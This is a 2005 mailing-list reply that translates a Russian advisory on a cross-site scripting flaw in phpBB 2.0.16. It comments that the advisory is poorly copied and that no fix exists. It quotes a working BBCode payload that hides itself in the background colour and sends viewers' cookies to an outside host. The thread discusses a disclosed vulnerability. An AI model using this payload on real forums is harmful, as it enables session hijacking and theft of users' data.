On Wed, Jul 06, 2005 at 11:20:45AM +0200, Moritz Muehlenhoff wrote: > Hi, > These advisories on phpbb2 have been posted to Bugtraq. Unfortunately > they are written in Russian: > http://www.securitylab.ru/55612.html
Cross-site scripting with phpbb forums Program: phpbb 2.0.16 Severity: low Exploit available: yes Description: a vulnerability is phpbb forum allows a remote user to carry out an XSS attack. The remote user can insert a specially constructed combination of BB tags into forum messages to cause arbitrary code execution in the browser of a user that views the malicious message. The vulnerability can be used to steal the user's private information (session IDs or cookies). Sample exploit: [color=#EFEFEF][url]www.ut[url=www.s='' style='font-size:0;color:#EFEFEF 'style='top:expression(eval(this.sss)); 'sss=`i=new/**/Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; this.sss=null`style='font-size:0;] [/url][/url]'[/color] Replace ЦВЕТ_ФОНА (BACKGROUND_COLOR) with the value for the message background used by this forum skin. For the standard subsilver this is #EFEFEF. This is done so that the introduction of the exploit is not noticeable to the naked eye in other browsers where the code doesn't work, yadda yadda. Author's URL: http://www.phpbb.com Solution: there is no fix for this vulnerability at present. Curiously, this seems to be nothing more than a bad copy from the second advisory, since there is obviously no occurence of ЦВЕТ_ФОНА in the sample exploit provided... > http://antichat.ru/txt/phpbb/ Neither provides any information about a fix. The second one does go into more detail, but I'd imagine the sample exploit is the important part and the rest is ignorable. If not, Babelfish seems to be a surprisingly usable Russian-English translation dictionary -- I wonder why they can't do this good a job on the other languages. :-) -- Steve Langasek postmodern programmer
signature.asc
Description: Digital signature
